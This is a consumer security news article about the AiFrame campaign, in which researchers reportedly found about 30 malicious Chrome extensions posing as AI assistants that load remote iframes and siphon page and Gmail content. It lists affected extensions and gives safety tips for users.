As a busy professional, your time is valuable, and so is your online security. Even with Google’s continuous efforts to enhance safety, malicious browser extensions are still making their way onto the Chrome Web Store, potentially jeopardizing your data and devices. These harmful add-ons can hijack your browsing data, steal your credentials, or inject unwanted content into your browser.
Introducing the AiFrame Campaign
Recently, researchers from LayerX, a leading browser security platform, uncovered a malicious operation dubbed the AiFrame campaign. This involved a staggering 30 malicious Chrome extensions disguised as AI assistants for tasks like summarization, chat, writing, and Gmail support.
LayerX traced these extensions back to a common domain, tapnetic[.]pro, and found that they shared:
- The same internal structure
- Identical JavaScript logic
- Similar permission requests
- A unified backend infrastructure
This confirms that the campaign was not random but a well-organized operation targeting unsuspecting users.
Over 300,000 Users Affected
With more than 300,000 users having installed these malicious extensions, the most notorious one was the Gemini AI Sidebar, which boasted 80,000 users before its removal from the Chrome Web Store.
Investigations by trusted sources reveal that several other harmful extensions remain live on Google’s repository, with some having been installed tens of thousands of times. Notable mentions include:
- AI Sidebar – 70,000 users
- AI Assistant – 60,000 users
- ChatGPT Translate – 30,000 users
- AI GPT – 20,000 users
- ChatGPT – 20,000 users
- Another AI Sidebar – 10,000 users
- Google Gemini – 10,000 users
Despite different names, these extensions share the same identifying code and structure, making them a significant threat.
How These Extensions Operate
While these extensions claim to be AI assistants, they don’t run AI functionality on your device. Instead, they create a full-screen iframe that loads content from a remote domain. This poses a serious security risk as it allows operators to alter the extension’s behavior anytime without needing a review from the Chrome Web Store.
Security experts liken this method to how Microsoft Office Add-ins work, where remote logic can be modified without requiring a new version to be pushed out.
Stealthy Data Theft
While displaying a deceptive AI interface, these extensions quietly extract your data in the background. LayerX found that these malicious add-ons could:
- Scrape content from the websites you visit
- Capture sensitive data from authentication pages
- Utilize Mozilla’s Readability library to extract page content
Alarmingly, 15 of the extensions specifically target Gmail users. When features like AI-assisted replies are invoked, your email content can be transmitted to the operator’s backend infrastructure, breaching Gmail’s security boundary.
Why This Attack is Particularly Alarming
These so-called AI assistants may seem harmless, but they can:
- Modify their behavior on a whim
- Inject harmful scripts
- Steal your data without your knowledge
Although some extensions have been removed, many still pose a risk to users.
Protecting Yourself
Cybersecurity experts suggest several precautions to keep you safe:
Verify the Developer: Always check their website, reputation, and previous projects.
Don’t Rely Solely on Ratings: Be wary of fake reviews.
Use Antivirus Software: This can help detect suspicious behavior.
Limit Permissions: Avoid extensions that request excessive access.
Utilize Web-Based AI Tools: These are typically safer than installing add-ons.
For avid extension users, identity monitoring services can also help mitigate damage if data theft occurs.
The Bottom Line
The AiFrame campaign serves as a stark reminder that malicious extensions are evolving, and even tools branded as AI can harbor serious threats. With over 300,000 users already impacted and some extensions still available, taking a few extra seconds to verify an extension before installation could save you from severe privacy and financial repercussions down the line.
